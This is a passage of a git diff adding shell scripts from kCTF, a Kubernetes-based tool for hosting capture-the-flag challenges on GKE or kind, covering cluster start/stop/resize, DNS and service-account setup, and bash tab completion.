"${KCTF_CTF_DIR}/kctf/resources/kctf-operator-metrics-reader_rbac.authorization.k8s.io_v1_clusterrole.yaml" || return + "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/kctf-operator-manager-config_v1_configmap.yaml" || return + "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/kctf-operator-controller-manager-metrics-service_v1_service.yaml" || return + if [[ "$CLUSTER_TYPE" == "gce" ]]; then + start_operator_gce || return + else + "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/operator.yaml" || return + fi + OPERATOR_IMAGE=$("${KCTF_BIN}/yq" eval '.spec.template.spec.containers[].image | select(.=="*kctf-operator*")' "${KCTF_CTF_DIR}/kctf/resources/operator.yaml") + if [[ $? -ne 0 ]]; then + echo "Failed to find the operator image." >&2 + return 1 + fi + + # The operator needs to create some subresources, e.g. the gcsfuse service account + for i in {1..100}; do + "${KCTF_BIN}/kubectl" get pods --namespace kctf-operator-system -o=jsonpath='{.items[*].status.containerStatuses[?(@.ready==true)].imageID}' | grep "${OPERATOR_IMAGE}" && break + if [ "$i" == "100" ]; then + _kctf_log_err "Couldn't find a kctf-operator pod with status ready=true and image \"${OPERATOR_IMAGE}\" after 5 minutes" + "${KCTF_BIN}/kubectl" get pods --namespace kctf-operator-system -o=yaml >&2 + exit 1 + fi + echo -n '.' + sleep 3 + done +} + +function wait_for_nameserver { + nameserver="$1" + initial_timeout=300 + timeout=$initial_timeout + sleep_time=10 + while [[ "${timeout}" -gt 0 ]]; do + if nslookup -nosearch -norecurse -type=NS "${DOMAIN_NAME}." "${nameserver}" >/dev/null 2>/dev/null; then + return 0 + fi + _kctf_log "nameserver didn't serve NS record yet, sleeping for ${sleep_time}s" + sleep ${sleep_time} + timeout=$(($timeout - $sleep_time)) + done + _kctf_log_err "nameserver didn't serve NS record after ${initial_timeout}s" + return 1 +} + +required_apis=("containerregistry.googleapis.com" "compute.googleapis.com" "container.googleapis.com" "dns.googleapis.com") + +function check_required_apis { + GCP_APIS="$(gcloud services list --format 'get(config.name)')" + for required_api in "${required_apis[@]}"; do + if [[ ! "${GCP_APIS}" =~ "${required_api}" ]]; then + _kctf_log_err "Required GCP API \"${required_api}\" is not enabled" + return 1 + fi + done + return 0 +} + +function kctf_cluster_start_gce { + MIN_NODES="1" + MAX_NODES="2" + NUM_NODES="1" + MACHINE_TYPE="n2-standard-4" + SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum) + NETWORK="kctf-network-${SUFFIX:0:16}" + + if ! check_required_apis; then + _kctf_log_err "Please enable the required APIs by running 'gcloud services enable ${required_apis[@]}'" + return 1 + fi + + EXISTING_NETWORK=$(gcloud compute networks list --filter="name=${NETWORK}" --format 'get(name)') + if [ -z "${EXISTING_NETWORK}" ]; then + gcloud compute networks create ${NETWORK} --description "kCTF network for cluster ${CLUSTER_NAME}" >/dev/null || return + fi + + EXISTING_CLUSTER=$(gcloud container clusters list --filter "name=${CLUSTER_NAME}" --format 'get(name)') + if [ -z "${EXISTING_CLUSTER}" ]; then + CIDR="172.16.0.32/28" + gcloud container clusters create --release-channel=regular --enable-network-policy --enable-autoscaling --min-nodes ${MIN_NODES} --max-nodes ${MAX_NODES} --num-nodes ${NUM_NODES} --network ${NETWORK} --create-subnetwork name=kctf-subnet-${NETWORK} --no-enable-master-authorized-networks --enable-ip-alias --enable-private-nodes --master-ipv4-cidr ${CIDR} --enable-autorepair --preemptible --machine-type ${MACHINE_TYPE} --workload-pool=${PROJECT}.svc.id.goog ${CLUSTER_NAME} || return + fi + + EXISTING_ROUTER=$(gcloud compute routers list --filter "name=kctf-${CLUSTER_NAME}-nat-router" --format 'get(name)') + if [ -z "${EXISTING_ROUTER}" ]; then + gcloud compute routers create "kctf-${CLUSTER_NAME}-nat-router" --network="${NETWORK}" --region "${ZONE::${#ZONE}-2}" || return + fi + + EXISTING_NAT=$(gcloud compute routers nats list --router "kctf-${CLUSTER_NAME}-nat-router" --router-region "${ZONE::${#ZONE}-2}" --format 'get(name)') + if [ -z "${EXISTING_NAT}" ]; then + gcloud compute routers nats create "kctf-${CLUSTER_NAME}-nat-config" --router-region "${ZONE::${#ZONE}-2}" --router kctf-${CLUSTER_NAME}-nat-router --nat-all-subnet-ip-ranges --auto-allocate-nat-external-ips || return + fi + + "${KCTF_BIN}/kubectl" create namespace "kctf-system" --dry-run=client -oyaml | "${KCTF_BIN}/kubectl" apply -f - >&2 || return + + # GCSFUSE + + BUCKET_NAME="kctf-gcsfuse-${SUFFIX:0:16}" + GCS_GSA_NAME="${BUCKET_NAME}" + GCS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${GCS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)' || true) + if [ -z "${GCS_GSA_EMAIL}" ]; then + gcloud iam service-accounts create "${GCS_GSA_NAME}" --description "kCTF GCSFUSE service account ${CLUSTER_NAME} ${ZONE}" --display-name "kCTF GCSFUSE ${CLUSTER_NAME} ${ZONE}" || return + GCS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${GCS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)') + while [ -z "${GCS_GSA_EMAIL}" ]; do + sleep 1 + GCS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${GCS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)') + done + fi + + GCS_KSA_NAME="gcsfuse-sa" + + gcloud iam service-accounts add-iam-policy-binding --role roles/iam.workloadIdentityUser --member "serviceAccount:${PROJECT}.svc.id.goog[kctf-system/${GCS_KSA_NAME}]" ${GCS_GSA_EMAIL} || return + "${KCTF_BIN}/kubectl" create serviceaccount --namespace kctf-system ${GCS_KSA_NAME} --save-config --dry-run=client -o yaml | "${KCTF_BIN}/kubectl" apply -f - || return + "${KCTF_BIN}/kubectl" annotate serviceaccount --namespace kctf-system ${GCS_KSA_NAME} iam.gke.io/gcp-service-account=${GCS_GSA_EMAIL} --overwrite || return + + if ! gsutil du "gs://${BUCKET_NAME}/"; then + gsutil mb -l eu "gs://${BUCKET_NAME}/" || return + fi + + if gsutil uniformbucketlevelaccess get "gs://${BUCKET_NAME}" | grep -q "Enabled: True"; then + gsutil iam ch "serviceAccount:${GCS_GSA_EMAIL}:roles/storage.legacyBucketOwner" "gs://${BUCKET_NAME}" || return + gsutil iam ch "serviceAccount:${GCS_GSA_EMAIL}:roles/storage.legacyObjectOwner" "gs://${BUCKET_NAME}" || return + else + gsutil acl ch -u "${GCS_GSA_EMAIL}:O" "gs://${BUCKET_NAME}" || return + fi + + "${KCTF_BIN}/kubectl" create configmap gcsfuse-config --from-literal=gcs_bucket="${BUCKET_NAME}" --namespace kctf-system --dry-run=client -o yaml | "${KCTF_BIN}/kubectl" apply -f - || return + + "${KCTF_BIN}/kubectl" patch ServiceAccount default --patch "automountServiceAccountToken: false" || return + + # Cloud DNS + + if [ ! -z "${DOMAIN_NAME}" ]; then + ZONE_NAME=$(gcloud dns managed-zones list --filter "dns_name:${DOMAIN_NAME}." --format 'get(name)') + + if [ -z "${ZONE_NAME}" ]; then + ZONE_NAME="kctf-$(echo ${DOMAIN_NAME} | sed 's/[.]/--/g')" + _kctf_log "creating new managed-zone \"${ZONE_NAME}\"" + gcloud dns managed-zones create "${ZONE_NAME}" --description "DNS Zone for ${DOMAIN_NAME}" --dns-name="${DOMAIN_NAME}." || return + soa_ttl="$(gcloud dns record-sets list --zone=${ZONE_NAME} --type=SOA --name="${DOMAIN_NAME}." --format='get(ttl)')" + if [[ $? -ne 0 ]]; then return 1; fi + soa_data="$(gcloud dns record-sets list --zone=${ZONE_NAME} --type=SOA --name="${DOMAIN_NAME}." --format='get(rrdatas)')" + if [[ $? -ne 0 ]]; then return 1; fi + new_soa=($soa_data) + # update the serial no + new_soa[2]=$((${new_soa[2]} + 1)) + # change the ttl + new_soa[6]="60" + + _kctf_log "changing the SOA entry to reduce TTL" + gcloud dns record-sets transaction start --zone="${ZONE_NAME}" || return + gcloud dns record-sets transaction remove --zone="${ZONE_NAME}" --name "${DOMAIN_NAME}." --ttl "${soa_ttl}" --type "SOA" "${soa_data}" || return + gcloud dns record-sets transaction add --zone="${ZONE_NAME}" --name "${DOMAIN_NAME}." --ttl "60" --type "SOA" "${new_soa[*]}" || return + gcloud dns record-sets transaction describe --zone="${ZONE_NAME}" || return + if ! gcloud dns record-sets transaction execute --zone="${ZONE_NAME}"; then + gcloud dns record-sets transaction abort --zone="${ZONE_NAME}" || return + _kctf_log_err 'updating the SOA entry failed' + exit 1 + fi + _kctf_log "SOA updated" + else + _kctf_log "managed-zone \"${ZONE_NAME}\" exists, reusing" + fi + + DNS_ZONE_NAMESERVERS=$(gcloud dns managed-zones describe "${ZONE_NAME}" --format 'value[delimiter="\n"](nameServers)') + if [[ "${DOMAIN_NAME}" == *".kctf.cloud" ]]; then + _kctf_log "waiting for nameservers to be updated (should take roughly 1m)" + for nameserver in ${DNS_ZONE_NAMESERVERS}; do + wait_for_nameserver "${nameserver}" || return + done + KCTF_CLOUD_URL="${KCTF_CLOUD_BASE_URL}/subdomain?name=${DOMAIN_NAME%.kctf.cloud}&nameservers=$(paste -sd ',' <(echo "${DNS_ZONE_NAMESERVERS}"))" + _kctf_log 'requesting kctf.cloud subdomain' + kctf_cloud_tries=3 + kctf_cloud_timeout=10 + while true; do + curl --fail -X POST -H "x-api-key: ${KCTF_CLOUD_API_KEY}" "${KCTF_CLOUD_URL}" >/dev/null && break + kctf_cloud_tries=$(($kctf_cloud_tries - 1)) + if [[ $kctf_cloud_tries -le 0 ]]; then + _kctf_log_err 'could not register kctf.cloud subdomain' + exit 1 + fi + _kctf_log_warn "registering kctf.cloud subdomain failed, retrying in ${kctf_cloud_timeout}s" + sleep "${kctf_cloud_timeout}" + done + else + # print in red for attention + _kctf_log $'\001\e[0;31m\002'"ATTENTION: "$'\001\e[0m\002'"You need to add the following NS entries for your domain \"${DOMAIN_NAME}\":"$'\n'"${DNS_ZONE_NAMESERVERS}" + BYE_MSG=$'\001\e[0;31m\002'"ATTENTION: "$'\001\e[0m\002'"You need to add the following NS entries for your domain \"${DOMAIN_NAME}\":"$'\n'"${DNS_ZONE_NAMESERVERS}" + fi + + DNS_GSA_NAME="kctf-cloud-dns" + DNS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${DNS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)' || true) + + if [ -z "${DNS_GSA_EMAIL}" ]; then + gcloud iam service-accounts create "${DNS_GSA_NAME}" --description "kCTF Cloud DNS service account ${CLUSTER_NAME} ${ZONE}" --display-name "kCTF Cloud DNS ${CLUSTER_NAME} ${ZONE}" || return + DNS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${DNS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)') + while [ -z "${DNS_GSA_EMAIL}" ]; do + sleep 1 + DNS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${DNS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)') + done + fi + + DNS_KSA_NAME="external-dns-sa" + + gcloud iam service-accounts add-iam-policy-binding --role roles/iam.workloadIdentityUser --member "serviceAccount:${PROJECT}.svc.id.goog[kctf-system/${DNS_KSA_NAME}]" ${DNS_GSA_EMAIL} || return + "${KCTF_BIN}/kubectl" create serviceaccount --namespace kctf-system ${DNS_KSA_NAME} --save-config --dry-run=client -o yaml | "${KCTF_BIN}/kubectl" apply -f - || return + "${KCTF_BIN}/kubectl" annotate serviceaccount --namespace kctf-system ${DNS_KSA_NAME} iam.gke.io/gcp-service-account=${DNS_GSA_EMAIL} --overwrite || return + + gcloud projects add-iam-policy-binding ${PROJECT} --member=serviceAccount:${DNS_GSA_EMAIL} --role=roles/dns.admin || return + + "${KCTF_BIN}/kubectl" create configmap --namespace kctf-system external-dns --from-literal=DOMAIN_NAME=${DOMAIN_NAME} --from-literal=EMAIL_ADDRESS=${EMAIL_ADDRESS:-} --dry-run=client -o yaml | "${KCTF_BIN}/kubectl" apply -f - || return + fi + + if [[ "${DISABLE_SRC_RANGES}" == "0" ]]; then + if ! create_cloud_armor_policy; then + echo "Could not create the cloud armor policy. If you have quota issues, you can disable the feature with --disable-src-ranges." >&2 + return 1 + fi + fi + + create_operator || return +} + +function kctf_cluster_start_usage { + echo "usage: kctf cluster start [args]" >&2 + echo " -h|--help print this help" >&2 + echo " --disable-src-ranges Disable the ip range feature (gce only). Use this if you have security policy quota issues" >&2 +} + +function kctf_cluster_start { + DISABLE_SRC_RANGES="0" + + OPTS="h" + LONGOPTS="help,disable-src-ranges" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf cluster start" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_cluster_start_usage + return 1 + fi + eval set -- "$PARSED" + + while true; do + case "$1" in + -h|--help) + kctf_cluster_start_usage + return 1 + ;; + --disable-src-ranges) + DISABLE_SRC_RANGES="1" + shift + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + kctf_cluster_start_usage + return 1 + ;; + esac + done + + case "${CLUSTER_TYPE}" in + gce) + kctf_cluster_start_gce + return + ;; + kind) + kctf_cluster_start_kind + return + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac +} + +function kctf_cluster_stop_gce { + read -p "Do you really want to delete the GKE cluster? If you are sure type the cluster name (${CLUSTER_NAME}): " + if [[ ! "${REPLY}" = "${CLUSTER_NAME}" ]] + then + return 1 + fi + _kctf_log "deleting all challenges so that load balancers etc can be cleaned up" + CHALLENGES=$("${KCTF_BIN}/kubectl" get challenge --all-namespaces -o=jsonpath='{range .items[*]}{@.metadata.namespace}{"/"}{@.metadata.name}{" "}{end}') + if [[ ! -z "${CHALLENGES}" ]]; then + for chal_and_ns in ${CHALLENGES}; do + IFS='/' read -r -a chal_and_ns_array <<< "$chal_and_ns" + chal_namespace="${chal_and_ns_array[0]}" + chal_name="${chal_and_ns_array[1]}" + "${KCTF_BIN}/kubectl" delete "challenge/${chal_name}" --namespace "${chal_namespace}" + done + fi + + # deleting the cluster below takes a while, so sleeping for a bit doesn't hurt + _kctf_log "Sleeping 20s to give time to delete resources" + sleep 20 + + CLOUDSDK_CORE_DISABLE_PROMPTS=1 gcloud container clusters delete ${CLUSTER_NAME} + gcloud compute routers delete "kctf-${CLUSTER_NAME}-nat-router" --region "${ZONE::${#ZONE}-2}" --quiet + + SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum) + + NETWORK="kctf-network-${SUFFIX:0:16}" + gcloud compute networks delete ${NETWORK} --quiet + + GSA_NAME="kctf-gcsfuse-${SUFFIX:0:16}" + GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)' || true) + if [ -z "${GSA_EMAIL}" ]; then + gcloud iam service-accounts delete "${GSA_EMAIL}" + fi +} + +function kctf_cluster_start_kind { + if ! "${KCTF_BIN}/kind" get kubeconfig --name "${CLUSTER_NAME}" >/dev/null 2>/dev/null; then + "${KCTF_BIN}/kind" create cluster --name "${CLUSTER_NAME}" || return + fi + + "${KCTF_BIN}/kubectl" create namespace "kctf-system" --dry-run=client -oyaml | "${KCTF_BIN}/kubectl" apply -f - >&2 || return + + create_operator + + "${KCTF_BIN}/kubectl" patch ServiceAccount default --patch "automountServiceAccountToken: false" || return +} + +function kctf_cluster_stop_kind { + "${KCTF_BIN}/kind" delete cluster --name "${CLUSTER_NAME}" || return +} + +function kctf_cluster_stop { + case "${CLUSTER_TYPE}" in + gce) + kctf_cluster_stop_gce || return + return + ;; + kind) + kctf_cluster_stop_kind || return + return + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac +} + +function kctf_cluster_resize_usage { + echo -e "usage: kctf cluster resize [args]" >&2 + echo -e "args:" >&2 + echo -e " -h|--help print this help" >&2 + echo -e " --machine-type machine type to use" >&2 + echo -e " to list available types, run: gcloud compute machine-types list --zones=\"${ZONE}\"" >&2 + echo -e " --spot use spot VMs (reduced cost but no availability guarantees)" >&2 + echo -e " --min-nodes (required) minimum number of nodes in the cluster" >&2 + echo -e " --max-nodes (required) maximum number of nodes in the cluster" >&2 + echo -e " --num-nodes (required) initial number of nodes in the cluster" >&2 + echo -e " --pool-name name of the node pool" >&2 + echo -e " --old-pool name of the old pool to replace" >&2 +} + +function kctf_cluster_resize { + if [[ "${CLUSTER_TYPE}" != "gce" ]]; then + _kctf_log_err "only cluster type \"gce\" is supported by resize" + return 1 + fi + + OPTS="h" + LONGOPTS="help,machine-type:,spot,min-nodes:,max-nodes:,num-nodes:,pool-name:,old-pool:" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf cluster resize" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_cluster_resize_usage + exit 1 + fi + eval set -- "$PARSED" + + MACHINE_TYPE="n2-standard-4" + SPOT= + MIN_NODES= + MAX_NODES= + NUM_NODES= + NEW_POOL_NAME= + OLD_POOL_NAME= + while true; do + case "$1" in + -h|--help) + kctf_cluster_resize_usage + exit 0 + ;; + --machine-type) + MACHINE_TYPE="$2" + shift 2 + ;; + --spot) + SPOT=1 + shift 1 + ;; + --min-nodes) + MIN_NODES="$2" + shift 2 + ;; + --max-nodes) + MAX_NODES="$2" + shift 2 + ;; + --num-nodes) + NUM_NODES="$2" + shift 2 + ;; + --pool-name) + NEW_POOL_NAME="$2" + shift 2 + ;; + --old-pool) + OLD_POOL_NAME="$2" + shift 2 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + kctf_cluster_resize_usage + exit 1 + ;; + esac + done + + if [[ -z "${MIN_NODES}" ]] || [[ -z "${MAX_NODES}" ]] || [[ -z "${NUM_NODES}" ]]; then + _kctf_log_err "Required arguments missing" + kctf_cluster_resize_usage + exit 1 + fi + + if [[ -z "${OLD_POOL_NAME}" ]]; then + OLD_POOL_NAME=$(gcloud container node-pools list --cluster ${CLUSTER_NAME} --format 'value(name)') + if [ $(echo "${OLD_POOL_NAME}" | wc -l) != "1" ]; then + _kctf_log_err 'Multiple node pools found. Please choose which to replace with --old-pool.' + echo '== node pools ==' >&2 + echo "${OLD_POOL_NAME}" >&2 + exit 1 + fi + fi + + if [[ -z "${NEW_POOL_NAME}" ]]; then + NEW_POOL_NAME="${OLD_POOL_NAME}-resized" + fi + + if [ "${OLD_POOL_NAME}" = "${NEW_POOL_NAME}" ]; then + _kctf_log_err "New pool can't have the same name as the old pool." + exit 1 + fi + + if [[ $# -ne 0 ]]; then + _kctf_log_err "Unrecognized arguments \"$@\"." + kctf_cluster_resize_usage + exit 1 + fi + + _kctf_log 'Creating the new node pool' + gcloud container node-pools create "${NEW_POOL_NAME}" \ + --cluster="${CLUSTER_NAME}" \ + --machine-type="${MACHINE_TYPE}" \ + ${SPOT:+--spot} \ + --enable-autorepair \ + --enable-autoupgrade \ + --num-nodes="${NUM_NODES}" \ + --enable-autoscaling \ + --min-nodes="${MIN_NODES}" \ + --max-nodes="${MAX_NODES}" || return + + _kctf_log 'Cordoning old nodes' + for node in $("${KCTF_BIN}/kubectl" get nodes -l cloud.google.com/gke-nodepool="${OLD_POOL_NAME}" -o=name); do + "${KCTF_BIN}/kubectl" cordon "$node" || return + done + + _kctf_log 'Draining old nodes' + for node in $("${KCTF_BIN}/kubectl" get nodes -l cloud.google.com/gke-nodepool="${OLD_POOL_NAME}" -o=name); do + "${KCTF_BIN}/kubectl" drain --force --ignore-daemonsets --delete-local-data --grace-period=10 "$node" || return + done + + _kctf_log "Deleting old node pool \"${OLD_POOL_NAME}\"" + gcloud container node-pools delete "${OLD_POOL_NAME}" --cluster "${CLUSTER_NAME}" || return +} + +function kctf_cluster_usage { + echo -e "usage: kctf cluster command" >&2 + echo -e "available commands:" >&2 + echo -e " create: create a new cluster config" >&2 + echo -e " list: list available cluster configs" >&2 + echo -e " load: load an existing cluster config" >&2 + echo -e " start: start the cluster" >&2 + echo -e " stop: stop the cluster" >&2 + echo -e " resize: resize the cluster" >&2 + echo -e " set-src-ip-ranges: allow ranges of IPs to access the services" >&2 + echo -e " get-src-ip-ranges: print the current allowed IP ranges" >&2 +} + +function check_cluster_name { + if [[ -z "${CLUSTER_NAME-}" ]]; then + _kctf_log_err "No cluster config loaded. You need to run \"kctf cluster create\" or \"kctf cluster load\" first." + exit 1 + fi +} + +if [[ $# -lt 1 ]]; then + _kctf_log_err "unexpected argument count" + kctf_cluster_usage + exit 1 +fi + +case "$1" in + -h|--help) + kctf_cluster_usage + exit 0 + ;; + start) + shift + check_cluster_name + kctf_cluster_start $@ + # This is used for printing DNS settings once again at the end + echo $BYE_MSG + ;; + stop) + shift + check_cluster_name + kctf_cluster_stop $@ + ;; + resize) + shift + check_cluster_name + kctf_cluster_resize $@ + ;; + create) + shift + kctf_cluster_create $@ + ;; + list) + shift + kctf_cluster_list $@ + ;; + load) + shift + kctf_cluster_load $@ + ;; + set-src-ip-ranges) + shift + kctf_cluster_ip_ranges $@ + ;; + get-src-ip-ranges) + shift + kctf_cluster_get_ip_ranges $@ + ;; + *) + _kctf_log_err "unknown command" + kctf_cluster_usage + exit 1 + ;; +esac diff --git a/v8ctf/kctf/bin/kctf-completion b/v8ctf/kctf/bin/kctf-completion new file mode 100644 index 00000000..7d3f7d44 --- /dev/null +++ b/v8ctf/kctf/bin/kctf-completion @@ -0,0 +1,197 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +if [[ -n "${ZSH_VERSION:-}" ]]; then + autoload -U bashcompinit + bashcompinit +fi + +function _kctf_complete_chal_debug() { + if [ "$COMP_CWORD" == "3" ]; then + COMPREPLY=($(compgen -W "--help logs ssh port-forward docker" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + + case "${COMP_WORDS[3]}" in + logs|ssh|docker) + if [ "${PREV_IS_FLAG}" = 1 ]; then + if [ "${PREV_WORD}" = "--container" ]; then + # TODO get containers from challenge.yaml + COMPREPLY=($(compgen -W "challenge healthcheck" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + return 0 + fi + if [ "${COMP_WORDS[3]}" = "logs" ]; then + COMPREPLY=($(compgen -W "--help --container --tail" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + COMPREPLY=($(compgen -W "--help --container" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + port-forward) + if [ "${PREV_IS_FLAG}" = 1 ]; then + return + fi + COMPREPLY=($(compgen -W "--help --port --local-port" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + *) + return 1 + ;; + esac +} + +function _kctf_complete_chal() { + if [ "$COMP_CWORD" == "2" ]; then + COMPREPLY=($(compgen -W "--help create list start stop status debug" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + + case "${COMP_WORDS[2]}" in + list) + return + ;; + create) + if [ "${PREV_IS_FLAG}" = 1 ]; then + if [ "${PREV_WORD}" == "--challenge-dir" ]; then + COMPREPLY=($(compgen -d -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--template" ]; then + COMPREPLY=($(compgen -W "list $(ls ${KCTF_CTF_DIR}/kctf/challenge-templates/)" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + return 0 + fi + COMPREPLY=($(compgen -W "--help --template --challenge-dir" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + start|stop|status) + COMPREPLY=($(compgen -W "--help" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + debug) + _kctf_complete_chal_debug + return + ;; + *) + return 1 + ;; + esac +} + +# This will be out of date at some point, but still useful so worth it? +# We can't fetch it easily with gcloud unfortunately since it requires a project +GCP_REGIONS="us-east1-b us-east1-c us-east1-d us-east4-c us-east4-b us-east4-a us-central1-c us-central1-a us-central1-f us-central1-b us-west1-b us-west1-c us-west1-a europe-west4-a europe-west4-b europe-west4-c europe-west1-b europe-west1-d europe-west1-c europe-west3-c europe-west3-a europe-west3-b europe-west2-c europe-west2-b europe-west2-a asia-east1-b asia-east1-a asia-east1-c asia-southeast1-b asia-southeast1-a asia-southeast1-c asia-northeast1-b asia-northeast1-c asia-northeast1-a asia-south1-c asia-south1-b asia-south1-a australia-southeast1-b australia-southeast1-c australia-southeast1-a southamerica-east1-b southamerica-east1-c southamerica-east1-a asia-east2-a asia-east2-b asia-east2-c asia-northeast2-a asia-northeast2-b asia-northeast2-c asia-northeast3-a asia-northeast3-b asia-northeast3-c asia-southeast2-a asia-southeast2-b asia-southeast2-c europe-north1-a europe-north1-b europe-north1-c europe-west6-a europe-west6-b europe-west6-c northamerica-northeast1-a northamerica-northeast1-b northamerica-northeast1-c us-west2-a us-west2-b us-west2-c us-west3-a us-west3-b us-west3-c us-west4-a us-west4-b us-west4-c" +GCP_REGISTRIES="gcr.io asia.gcr.io eu.gcr.io us.gcr.io" + +function _kctf_complete_cluster() { + if [ "$COMP_CWORD" == "2" ]; then + COMPREPLY=($(compgen -W "--help start stop resize create load list set-src-ip-ranges get-src-ip-ranges" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + + case "${COMP_WORDS[2]}" in + start|stop) + COMPREPLY=($(compgen -W "--help --disable-src-ranges" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + resize) + if [ "${PREV_IS_FLAG}" = 1 ]; then + if [ "${PREV_WORD}" == "--old-pool" ]; then + COMPREPLY=($(compgen -W "$(gcloud container node-pools list --cluster ${CLUSTER_NAME} --format 'get(name)')" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--machine-type" ]; then + COMPREPLY=($(compgen -W "$(gcloud compute machine-types list --zones="${ZONE}" --format 'get(name)')" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + return 0 + fi + COMPREPLY=($(compgen -W "--machine-type --spot --min-nodes --max-nodes --num-nodes --pool-name --old-pool" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + create) + if [ "${PREV_IS_FLAG}" = 1 ] && [ "${PREV_WORD}" != "--start" ] && [ "${PREV_WORD}" != "--disable-src-ranges" ]; then + if [ "${PREV_WORD}" == "--type" ]; then + COMPREPLY=($(compgen -W "gce kind" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--project" ]; then + COMPREPLY=($(compgen -W "$(gcloud projects list --format 'get(project_id)')" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--zone" ]; then + COMPREPLY=($(compgen -W "${GCP_REGIONS}" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--registry" ]; then + COMPREPLY=($(compgen -W "${GCP_REGISTRIES}" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + if [ "${PREV_WORD}" == "--domain-name" ]; then + COMPREPLY=($(compgen -W "none" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + return 0 + fi + COMPREPLY=($(compgen -W "--help --type --project --zone --registry --cluster-name --domain-name --email-address --start --disable-src-ranges" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + ;; + load) + if [ "${COMP_CWORD}" == "3" ]; then + COMPREPLY=($(compgen -W "$(find ${KCTF_CTF_DIR}/kctf/config/ -type f -printf '%f\n')" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + return 0 + ;; + list) + return 0 + ;; + set-src-ip-ranges) + return 0 + ;; + *) + return 1 + ;; + esac +} + +function _kctf_complete() { + if [ "$COMP_CWORD" == "1" ]; then + COMPREPLY=($(compgen -W "--help chal cluster" -- "${COMP_WORDS[${COMP_CWORD}]}")) + return + fi + PREV_WORD="${COMP_WORDS[$(($COMP_CWORD - 1))]}" + if [ "${PREV_WORD:0:1}" = "-" ]; then + PREV_IS_FLAG="1" + else + PREV_IS_FLAG="0" + fi + case "${COMP_WORDS[1]}" in + chal) + _kctf_complete_chal + return + ;; + cluster) + _kctf_complete_cluster + return + ;; + *) + return 1 + ;; + esac +} +complete -F _kctf_complete kctf diff --git a/v8ctf/kctf/bin/kctf-log b/v8ctf/kctf/bin/kctf-log new file mode 100644 index 00000000..94929248 --- /dev/null +++ b/v8ctf/kctf/bin/kctf-log @@ -0,0 +1,35 @@ +#!/bin/bash +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +_KCTF_COLOR_RED=$'\e[0;31m' +_KCTF_COLOR_GREEN=$'\e[0;32m' +_KCTF_COLOR_YELLOW=$'\e[0;33m' +_KCTF_COLOR_END=$'\e[0m' + +function _kctf_log { + echo -n "${_KCTF_COLOR_GREEN}[*]${_KCTF_COLOR_END} " 